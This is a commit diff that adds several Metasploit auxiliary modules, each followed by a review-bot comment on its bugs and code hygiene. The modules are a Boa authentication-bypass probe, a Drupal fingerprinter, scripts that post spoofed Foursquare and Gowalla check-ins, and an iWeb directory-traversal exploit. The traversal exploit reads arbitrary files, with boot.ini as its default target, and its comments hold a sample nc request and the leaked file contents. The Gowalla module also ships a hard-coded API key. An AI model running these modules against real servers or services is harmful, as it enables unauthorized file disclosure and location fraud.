Commit
1 parent
e5fe99a
commit a4a0287
Showing
8 changed files
with
659 additions
and
0 deletions.
@@ -0,0 +1,65 @@ | |||
## | |||
# This file is part of the Metasploit Framework and may be subject to | |||
# redistribution and commercial restrictions. Please see the Metasploit | |||
# Framework web site for more information on licensing and terms of use. | |||
# http://metasploit.com/framework/ | |||
## | |||
|
|||
|
|||
require 'msf/core' | |||
|
|||
|
|||
class Metasploit3 < Msf::Auxiliary | |||
|
|||
# Exploit mixins should be called first | |||
include Msf::Exploit::Remote::HttpClient | |||
include Msf::Auxiliary::WMAPScanServer | |||
# Scanner mixin should be near last | |||
#include Msf::Auxiliary::Scanner | |||
include Msf::Auxiliary::Report | |||
|
|||
def initialize | |||
super( | |||
'Name' => 'Boa Authentication Bypass Exploit', | |||
'Version' => '$Revision: $', | |||
'Description' => 'This module checks for your moms...', | |||
'Author' => ['CG'], | |||
'License' => MSF_LICENSE, | |||
'References' => | |||
[ | |||
[ 'URL', 'http://www.milw0rm.com/exploits/4542' ], | |||
[ 'URL', 'http://www.securityfocus.com/archive/1/479434'], | |||
] | |||
) | |||
|
|||
end | |||
|
|||
def run | |||
|
|||
|
|||
begin | |||
res = send_request_raw({ | |||
'version' => '1.1', | |||
'uri' => '/home/index.shtml', | |||
'method' => 'GET', | |||
}, 10) | |||
|
|||
if (res and res.headers['Server']) | |||
if res.headers['Server'] =~ /Boa/ | |||
print_status("#{datastore['RHOST']} is possibly vuln #{res.headers['Server']}\n Attempting to change password to blah:blah") | |||
elsif | |||
print_status("#{datastore['RHOST']} is not vuln #{res.headers['Server']}") | |||
end | |||
|
|||
else | |||
'' | |||
end | |||
|
|||
end | |||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | |||
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e | |||
puts e.message | |||
end | |||
end | |||
#end | |||
|
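Review bot: The `elsif` in the Server-header check has no condition on its line, so Ruby takes the following `print_status(...)` call as the condition; the "is not vuln" message is printed only as a side effect of evaluating that condition and the branch body is empty. Replace it with `else`; the Drupal Check module in this commit uses the same construct in its Expires-header check. The status line on the Boa match also announces `Attempting to change password to blah:blah`, but nothing in `run` follows it, so the message should state only what was observed, e.g. `print_status("#{datastore['RHOST']} reports Server: #{res.headers['Server']} (Boa) - possibly affected")`. The 'Description' metadata is a placeholder and should describe the Server-header check the module actually performs.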
@@ -0,0 +1,77 @@ | |||
## | |||
# This file is part of the Metasploit Framework and may be subject to | |||
# redistribution and commercial restrictions. Please see the Metasploit | |||
# Framework web site for more information on licensing and terms of use. | |||
# http://metasploit.com/framework/ | |||
## | |||
|
|||
|
|||
require 'msf/core' | |||
|
|||
|
|||
class Metasploit3 < Msf::Auxiliary | |||
|
|||
# Exploit mixins should be called first | |||
include Msf::Exploit::Remote::HttpClient | |||
include Msf::Auxiliary::WMAPScanServer | |||
# Scanner mixin should be near last | |||
#include Msf::Auxiliary::Scanner | |||
include Msf::Auxiliary::Report | |||
|
|||
def initialize | |||
super( | |||
'Name' => 'Drupal Check', | |||
'Version' => '$Revision: $', | |||
'Description' => 'This module check for the existence of the Drupal CMS by using the Expires: Sun, 19 Nov 1978 05:00:00 GMT header value. This should identify Drupal 4.6 and above. You MUST set the VHOST to be the domain name for this to work.', | |||
'Author' => ['CG'], | |||
'License' => MSF_LICENSE, | |||
'References' => | |||
[ | |||
[ 'URL', 'http://www.lullabot.com/articles/is-site-running-drupal' ], | |||
] | |||
) | |||
|
|||
register_options( | |||
[ | |||
OptString.new('UserAgent', [true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]), | |||
OptString.new('VHOST', [true, "The VHOST -- Must set for this module", 'www.google.com' ]) | |||
], self.class) | |||
end | |||
|
|||
def run | |||
|
|||
|
|||
begin | |||
agent = datastore['UserAgent'] | |||
res = send_request_raw({ | |||
'version' => '1.0', | |||
'uri' => '/', | |||
'method' => 'GET', | |||
'headers' => | |||
{ | |||
'Accept' => '*/*', | |||
'Connection' => 'Keep-Alive', | |||
} | |||
|
|||
}, 10) | |||
|
|||
if (res and res.headers['Expires']) | |||
if res.headers['Expires'] =~ /Sun, 19 Nov 1978 05:00:00 GMT/ | |||
print_status("#{datastore['RHOST']} is running Drupal CMS\nServer response #{res.headers['Expires']}") | |||
elsif | |||
print_status("#{datastore['RHOST']} is not running Drupal CMS\nServer response #{res.headers['Expires']}") | |||
end | |||
|
|||
|
|||
else | |||
'' | |||
end | |||
|
|||
end | |||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | |||
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e | |||
puts e.message | |||
end | |||
end | |||
#end | |||
|
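Review bot: `VHOST` is declared as a required option but given the default `'www.google.com'`, so a user who forgets to set it still passes validation and the probe goes out with a Host header naming an unrelated third-party domain; leave the default out so the framework refuses to run until a real value is supplied, `OptString.new('VHOST', [true, "The VHOST -- Must set for this module"])`. The local `agent` assigned at the top of `run` is never used in the request hash; either drop it or pass it explicitly as `'agent' => agent` if the HttpClient mixin does not already read the UserAgent option (not verifiable from this hunk). `puts e.message` in the rescue bypasses the module's output channel; `print_error(e.message)` keeps the failure visible in msfconsole and in logs.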
@@ -0,0 +1,75 @@ | |||
## | |||
# This file is part of the Metasploit Framework and may be subject to | |||
# redistribution and commercial restrictions. Please see the Metasploit | |||
# Framework web site for more information on licensing and terms of use. | |||
# http://metasploit.com/framework/ | |||
## | |||
|
|||
require 'msf/core' | |||
|
|||
|
|||
class Metasploit3 < Msf::Auxiliary | |||
|
|||
# Exploit mixins should be called first | |||
include Msf::Exploit::Remote::HttpClient | |||
include Msf::Auxiliary::Report | |||
|
|||
def initialize | |||
super( | |||
'Name' => 'Foursquare Location Poster', | |||
'Version' => '$Revision:$', | |||
'Description' => 'Fuck with Foursquare, be anywhere you want to be by venue id', | |||
'Author' => ['CG'], | |||
'License' => MSF_LICENSE, | |||
'References' => | |||
[ | |||
[ 'URL', 'http://groups.google.com/group/foursquare-api' ], | |||
[ 'URL', 'http://www.mikekey.com/im-a-foursquare-cheater/'], | |||
] | |||
) | |||
#todo pass in geocoords instead of venueid, create a venueid, other tom foolery | |||
register_options( | |||
[ | |||
Opt::RHOST('api.foursquare.com'), | |||
OptString.new('VENUEID', [ true, 'foursquare venueid', '185675']), #Louve Paris France | |||
OptString.new('USERNAME', [ true, 'foursquare username', 'username']), | |||
OptString.new('PASSWORD', [ true, 'foursquare password', 'password']), | |||
], self.class) | |||
|
|||
end | |||
|
|||
def run | |||
|
|||
begin | |||
user = datastore['USERNAME'] | |||
pass = datastore['PASSWORD'] | |||
venid = datastore['VENUEID'] | |||
user_pass = Rex::Text.encode_base64(user + ":" + pass) | |||
decode = Rex::Text.decode_base64(user_pass) | |||
postrequest = "twitter=1\n" #add facebook=1 if you want facebook | |||
|
|||
print_status("Base64 Encoded User/Pass: #{user_pass}") #debug | |||
print_status("Base64 Decoded User/Pass: #{decode}") #debug | |||
|
|||
res = send_request_cgi({ | |||
'uri' => "/v1/checkin?vid=#{venid}", | |||
'version' => "1.1", | |||
'method' => 'POST', | |||
'data' => postrequest, | |||
'headers' => | |||
{ | |||
'Authorization' => "Basic #{user_pass}", | |||
'Proxy-Connection' => "Keep-Alive", | |||
} | |||
}, 25) | |||
|
|||
print_status("#{res}") #this outputs entire response, could probably do without this but its nice to see whats going on | |||
end | |||
|
|||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | |||
rescue ::Timeout::Error, ::Errno::EPIPE =>e | |||
puts e.message | |||
end | |||
end | |||
|
|||
|
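Review bot: The two "debug" `print_status` lines echo the Base64 form and then the decoded plaintext `USERNAME:PASSWORD` to the console, so the operator's credentials end up in msfconsole output and in any session or spool log; the `decode` round-trip exists only for that echo. Drop both lines together with the `Rex::Text.decode_base64` call, or at most `vprint_status("Using HTTP Basic auth for #{user}")` without the secret. The Gowalla Location Poster in this commit has the same pair of lines. The final `print_status("#{res}")` dumps the whole response object; printing `res.code` and, under verbose, `res.body` would be enough.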
@@ -0,0 +1,89 @@ | |||
## | |||
# This file is part of the Metasploit Framework and may be subject to | |||
# redistribution and commercial restrictions. Please see the Metasploit | |||
# Framework web site for more information on licensing and terms of use. | |||
# http://metasploit.com/framework/ | |||
## | |||
|
|||
require 'msf/core' | |||
|
|||
|
|||
class Metasploit3 < Msf::Auxiliary | |||
|
|||
# Exploit mixins should be called first | |||
include Msf::Exploit::Remote::HttpClient | |||
include Msf::Auxiliary::Report | |||
|
|||
def initialize | |||
super( | |||
'Name' => 'Gowalla Location Poster', | |||
'Version' => '$Revision:$', | |||
'Description' => 'Fuck with Gowalla, be anywhere you want to be by spot id', | |||
'Author' => ['CG'], | |||
'License' => MSF_LICENSE, | |||
'References' => | |||
[ | |||
[ 'URL', 'http://groups.google.com/group/foursquare-api' ], | |||
[ 'URL', 'http://www.mikekey.com/im-a-foursquare-cheater/'], | |||
] | |||
) | |||
#todo pass in geocoords instead of venueid, create a venueid, other tom foolery | |||
register_options( | |||
[ | |||
Opt::RHOST('api.gowalla.com'), | |||
OptString.new('UserAgent', [true, "Specify Gowalla UserAgent",'Gowalla/1.1 (unknown, Android, 4, android, 0.9.1, 320x480)']), | |||
#OptString.new('UserAgent', [true, "Specify Gowalla UserAgent",'Gowalla/1.1 (unknown, Android, 4, android-devphone1/Android Dev Phone 1, 0.9.1-73-g59c95ca, 320x480)']), | |||
OptString.new('SPOTID', [ true, 'gowalla spot id', '14515']), #Facebook HQ | |||
OptString.new('USERNAME', [ true, 'gowalla username', 'username']), | |||
OptString.new('PASSWORD', [ true, 'gowalla password', 'password']), | |||
OptString.new('GPSLONGITUDE', [ true, 'GPS Longitude', '-122.1525514126']), | |||
OptString.new('GPSLATITUDE', [ true, 'GPS Latitude', '37.4157602871']), | |||
OptString.new('GOWALLAAPIKEY', [ true, 'gowalla API Key', '4a35a8b7df6a405a816b01cd5b44b95d']), | |||
OptString.new('COMMENT', [ true, 'Comment', 'fooooood']), | |||
], self.class) | |||
|
|||
end | |||
|
|||
def run | |||
|
|||
begin | |||
user = datastore['USERNAME'] | |||
pass = datastore['PASSWORD'] | |||
spotid = datastore['SPOTID'] | |||
lng = datastore['GPSLONGITUDE'] | |||
lat = datastore['GPSLATITUDE'] | |||
api = datastore['GOWALLAAPIKEY'] | |||
comment = datastore['COMMENT'] | |||
|
|||
user_pass = Rex::Text.encode_base64(user + ":" + pass) | |||
decode = Rex::Text.decode_base64(user_pass) | |||
postrequest = "lng=#{lng}&accuracy=0.0&post_to_facebook=0&post_to_twitter=1&comment=#{comment}&lat=#{lat}\n" | |||
|
|||
print_status("Base64 Encoded User/Pass: #{user_pass}") #debug | |||
print_status("Base64 Decoded User/Pass: #{decode}") #debug | |||
|
|||
res = send_request_cgi({ | |||
'uri' => "/checkins?spot_id=#{spotid}", | |||
'version' => "1.1", | |||
'method' => 'POST', | |||
'data' => postrequest, | |||
'headers' => | |||
{ | |||
'Authorization' => "Basic #{user_pass}", | |||
'X-Gowalla-API-Version' => "1", | |||
'Accept' => 'application/json', | |||
'Proxy-Connection' => "Keep-Alive", | |||
'X-Gowalla-API-Key' => "#{api}" | |||
} | |||
}, 25) | |||
|
|||
print_status("#{res}") #this outputs entire response, could probably do without this but its nice to see whats going on | |||
end | |||
|
|||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | |||
rescue ::Timeout::Error, ::Errno::EPIPE =>e | |||
puts e.message | |||
end | |||
end | |||
|
|||
|
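Review bot: The `GOWALLAAPIKEY` option ships with a literal API key as its default, which commits a credential to the repository and ties every user of the module to the same key; the default should be omitted so the required-option check forces the operator to supply their own, `OptString.new('GOWALLAAPIKEY', [ true, 'gowalla API Key'])`. The form body interpolates `comment` (and `lat`/`lng`) without URL encoding, so a comment containing `&`, `=` or a space corrupts the request body; use `comment=#{Rex::Text.uri_encode(comment)}`. The 'References' entries are copied from the Foursquare module and do not describe Gowalla.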
@@ -0,0 +1,77 @@ | |||
## | |||
# This file is part of the Metasploit Framework and may be subject to | |||
# redistribution and commercial restrictions. Please see the Metasploit | |||
# Framework web site for more information on licensing and terms of use. | |||
# http://metasploit.com/framework/ | |||
## | |||
|
|||
require 'msf/core' | |||
|
|||
|
|||
class Metasploit3 < Msf::Auxiliary | |||
|
|||
# Exploit mixins should be called first | |||
include Msf::Exploit::Remote::HttpClient | |||
# Scanner mixin should be near last | |||
include Msf::Auxiliary::Report | |||
|
|||
def initialize | |||
super( | |||
'Name' => 'iWeb HTTP Server Directory Transversal Vulnerability', | |||
'Version' => '$Revision: $', | |||
'Description' => 'This modules exploits the iWeb HTTP Server Directory Transversal Vulnerability', | |||
# some webcam shit has a similar Server Header see below for actual server header. | |||
# default install path C:\Progam Files\Ashley Brown\iWeb\ | |||
'Author' => 'CG' , | |||
'License' => MSF_LICENSE, | |||
'References' => | |||
[ | |||
[ 'URL', 'http://packetstormsecurity.org/0912-exploits/iweb-traversal.txt' ], | |||
[ 'BID', '37228' ], | |||
[ 'URL', 'http://www.ashleybrown.co.uk/iweb/' ], | |||
[ 'URL', 'http://www.exploit-db.com/exploits/10331' ] | |||
] | |||
) | |||
register_options( | |||
[ | |||
OptString.new('FILE', [ true, "The file to view", 'boot.ini']), | |||
OptString.new('TRAV', [ true, "Traversal Depth", '..%5C..%5C..%5C']), | |||
], self.class) | |||
end | |||
|
|||
def run | |||
|
|||
begin | |||
file = datastore['FILE'] | |||
trav = datastore['TRAV'] | |||
res = send_request_raw({ | |||
'uri' => '/'+trav+file, | |||
'method' => 'GET' | |||
}, 10) | |||
|
|||
if (res and res.code == 200) | |||
print_status("Output Of Requested File:\n#{res.body}") | |||
else | |||
print_status("Received #{res.code} for #{trav}#{file}") | |||
end | |||
|
|||
#rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | |||
#rescue ::Timeout::Error, ::Errno::EPIPE | |||
end | |||
end | |||
|
|||
end | |||
|
|||
# nc 172.16.10.132 80 | |||
# GET ..%5C..%5C..%5Cboot.ini HTTP/1.0 | |||
|
|||
# HTTP/1.1 200 OK | |||
# LastModified: 12/22/2005 3:22:59 PM | |||
# Server: iWeb | |||
# Content-Length: 210 | |||
|
|||
# [boot loader] | |||
# timeout=30 | |||
# default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS | |||
# [operating systems] | |||
# multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect |
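Review bot: The `else` branch of the response check dereferences `res.code`, but that branch is also taken when `send_request_raw` returns nil (no response), which raises NoMethodError and aborts the run with a backtrace instead of a message. Change the branch to `elsif res` followed by the existing `print_status`, and add `else` / `print_error("No response from #{datastore['RHOST']}")`. The connection-error `rescue` clauses below it are commented out, so Rex connection failures also surface as raw exceptions; restoring them with a `print_error` in the body would match the other modules in this commit. The trailing block comment documents a sample response; if it is kept it belongs in the module's 'Description' or a README rather than after the class.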